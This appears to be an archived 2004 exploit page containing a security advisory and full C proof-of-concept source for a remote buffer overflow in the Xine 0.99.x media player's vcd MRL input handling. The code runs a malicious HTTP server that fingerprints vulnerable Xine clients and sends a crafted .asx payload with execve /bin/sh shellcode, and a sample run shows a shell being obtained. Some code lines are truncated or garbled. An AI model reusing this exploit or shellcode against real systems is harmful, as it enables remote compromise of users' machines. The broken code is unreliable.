Xine 0.99.x vcd input identifier management Remote Exploit

 

                        

                          

                            
                          

                        

                      


                      
 /*
  *********************************************************************
  $ An open security advisory #6 - Xine vcd MRL input identifier management overflow
  *********************************************************************
  1: Bug Researcher: c0ntex[at]open-security.org
  2: Bug Released: August 08th 2004
  3: Bug Impact Rate: Medium / Hi
  4: Bug Scope Rate: Remote / Local
  *********************************************************************
  $ This advisory and/or proof of concept code must not be used for commercial gain.
  *********************************************************************

   open-security org advisories 6

   An example malicious .asx file:

   sunscreen$ cat open-security.asx
   
   Open Security Media Archive
   Brought to you by c0ntex[at]open-security.org
        
         SongList:
         Track 1 - Open Security Rock(s) -> SOAD  - Chop Suey
         Track 2 - Open Security Rock(s) -> Media Mayhem Militia
        
                
                System Of A Down - Chop Suey
                c0ntex[at]open-security.org
                ©2004
                
                
                
                All your media are belong to us!
                c0ntex[at]open-security.org
                ©2004
                
                
   
   sunscreen$ 

   ---

   Example POC run:

   sunscreen$ gcc -o xinesmine xinesmine.c -lsocket -lnsl
   sunscreen$ ./xinesmine -a 0 -p 80
 
      **  Xines_Mine - Remote proof of concept example  **
 
   [-] Uses .asx header reference to make Xine think it has valid
   [-] reference file, then a crafted package is sent to overflow
   [-] the vulnerable client && prove remote exploit concept.
   [-] c0ntex[at]open-security.org {} http://www.open-security.org
 
    -> Listening for a connection on port 80


   [c0ntex@exploited xine]$ ./xine --no-splash http://sunscreen/opensecurity.asx
   This is xine (X11 gui) - a free video player v0.99.2.
   (c) 2000-2004 The xine Team.
   Playlist file (http://sunscreen/opensecurity.asx) is invalid.
   WARN: could not retrieve file info for `image.nrg': No such file or directory
   WARN: init failed
   WARN: open(



                                                                    1?Ph//shh/bin??PS??1¿':
   File name too long
   WARN: could not retrieve file info for `




                                                                    1?Ph//shh/bin??PS??1¿':
   File name too long
   WARN: init failed
   bash-2.05$ 

   ---
    
   CVS log which details the bug perfectly can be found here:

        -> http://sourceforge.net/mailarchive/forum.php?thread_id=5143955&forum_id=11923


   Get the latest CVS of Xine-lib from here:

        -> http://xinehq.de/index.php/releases


   Get the Xine (XSA) advisory from here:

        -> http://xinehq.de/index.php/security


   Get this original advisory from here:

        -> http://www.open-security.org/advisories/advisories.html

  ---
 
  Xine bug discovered 22nd May 2004
  Xine bug research completed 24th May 2004
  Xine developers contacted 11th July 2004
  Xine bug public release 8th August 2004
 

  cheers
  c0ntex[at]open-security.org
  http://www.open-security.org

 */



#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

#ifdef linux
 #include 
#endif


#define SUCCESS 0
#define FAILURE 1

#define BUFFER  1044
#define CDATA   150
#define JMP     200

#define THREAT  "xine/1-rc5"
#define XPLOIT_OS Redhat9


#define example(OhNoo)  fprintf(stderr, "Usage: ./xines_mine -a  -p \n\n", OhNoo);


void die(char * errtrap);
void banner(void);
int prepsock(int align_stack, int port);
int pkg_send(int clisock_fd, int align_stack, char * pload, char * payload);
int main(int argc, char ** argv); 


static char * http[] = {
        "HTTP/1.0 200 OK\r\n",
        "Date: Thu, 23 May 2004 12:52:15 GMT\r\n",
        "Server: Xines_Mine Server(Linux)\r\n",
        "MIME-version: 1.0\r\n",
        "Content-Type: audio/x-mpegurl\r\n",
        "Content-Length: 2000\r\n",
        "Connection: close\r\n",
        "\r\n"
};
 

static char * vcdmuxor[] = {
        "\r\n",
        "Xines_Mine\r\n",
        " c0ntex[at]open-security.org www.open-security.org\r\n",
        "\r\n",
        "\r\n",
        "\r\n",
        "\r\n",
        "\r\n"
};

 
static char opcode[] =  "\x31\xc0\x31\xdb\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62"
                                 "\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd"
                                 "\x80\x31\xc0\x31\xdb\xfe\xc0\xcd\x80";


void
die(char * errtrap)
{
        perror(errtrap);
        _exit(FAILURE);
        //exit(1);
}
 

void
banner(void)
{
        fprintf(stderr, "\n   **  Xines_Mine - Remote proof of concept example  **\n\n");
        fprintf(stderr, "[-] Uses .asx header reference to make Xine think it has valid\n");
        fprintf(stderr, "[-] reference file, then a crafted package is sent to overflow\n");
        fprintf(stderr, "[-] the vulnerable client && prove remote exploit concept.\n");
        fprintf(stderr, "[-] c0ntex[at]open-security.org {} http://www.open-security.org  \n\n");
}
 
 
int
prepsock(int align_stack, int port)
{
      unsigned int cl_buf, recv_chk, reuse = 1;
      unsigned int clisock_fd;

      signed int sock_fd;

      static char chk_vuln[CDATA];
      static char payload[BUFFER];

      struct sockaddr_in victimised, xine;

      char *pload = (char *) &opcode;


      ((sock_fd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
      ? die("Could not create socket")
      : (setsockopt(sock_fd,SOL_SOCKET,SO_REUSEADDR, &reuse, sizeof(int)) == -1)
            ? die("Could not re-use socket")
                : memset(&xine, 0, sizeof(xine));
 
      xine.sin_family = AF_INET;
      xine.sin_port = htons(port);
      xine.sin_addr.s_addr = htonl(INADDR_ANY);
 
      if(bind(sock_fd, (struct sockaddr *)&xine, sizeof(struct sockaddr)) == -1) {
        close(sock_fd); die("Could not bind socket");
      }
 
      if(listen(sock_fd, 0) == -1) {
              close(sock_fd); die("Could not listen on socket");
      }
 

      printf(" -> Listening for a connection on port %d\n", port);
 

      cl_buf = sizeof(victimised);
      clisock_fd = accept(sock_fd, (struct sockaddr *)&victimised, &cl_buf);

      if(!clisock_fd) {
        die("Could not accept connection\n");
      }

      if(!close(sock_fd)) {
        fprintf(stderr, "Could not close socket\n");
      }


      fprintf(stderr, " -> Action: Attaching from host [%s]\n", inet_ntoa(victimised.sin_addr));
      fprintf(stderr, " -> Using align [%d] and port [%d]\n", align_stack, port);
 

      //memset(chk_vuln, 0, CDATA);
      memset(chk_vuln, 0, sizeof(chk_vuln));
 
      recv_chk = recv(clisock_fd, chk_vuln, sizeof(chk_vuln), 0);
      chk_vuln[recv_chk+1] = '\0';
 
      if((recv_chk == -1) || (recv_chk == 0)) {
              fprintf(stderr, "Could not receive data from client\n");
      }
 
      if(strstr(chk_vuln, THREAT)) {
              fprintf(stderr, " -> Detected vulnerable Xine version\n");
      }else{
              fprintf(stderr, " -> Detected a non-Xine connection, end.\n");
                  close(clisock_fd); die("Ending connection, not a Xine client\n");
      }

      if(pkg_send(clisock_fd, align_stack, pload, payload) == 1) {
              fprintf(stderr, "Could not send package\n");
              close(clisock_fd); die("Could not send package!\n");
      }

      if(close(clisock_fd) != 0) {
                fprintf(stderr, "Could not close socket\n");
        }

      return clisock_fd;
      //return SUCCESS;
}
 
 
int
pkg_send(int clisock_fd, int align_stack, char * pload, char * payload)
{
        unsigned int i = 0;
 
        memset(payload, 0, BUFFER);
 
        for(i = (BUFFER - JMP + align_stack); i  Payload size to send is [%4d]\n", strlen(payload));
        fprintf(stderr, " -> Sending evil payload to our client\n");       fflush(stderr);


        for (i = 0; i  3)) {
                                        goto jumpout;
                                }
                                break;
                        case 'p':
                                port = atoi(optarg);
                                if((port  65535)) {
                                        goto jumpout;
                                } 
                                break;
                        default:
                                goto jumpout;
                                break;
                        }
        }
 
        if(prepsock(align_stack, port) == -1) {
                fprintf(stderr, "Error\n");
                _exit(FAILURE);
        } fprintf(stderr, " -> Test complete\n\n");

        return EXIT_SUCCESS;

        jumpout:
                banner();
                example(exploit);
                return EXIT_FAILURE;
}

                    		
                  

                

              

            

            

              
                

                  
                    
 F-VNS Security Audits de Sécurité & Tests Intrusifs Mailing Listes Advisories  Service Publicitaire

                  		
                

              
            

          		
        

      
    

  

  

    

      
        

          
Tous droits réservés © 2002-2004 K-OTiK Security Voir Notice Légale   

        

      		
    

  

  

    

      
        
actualité informatique  Exploits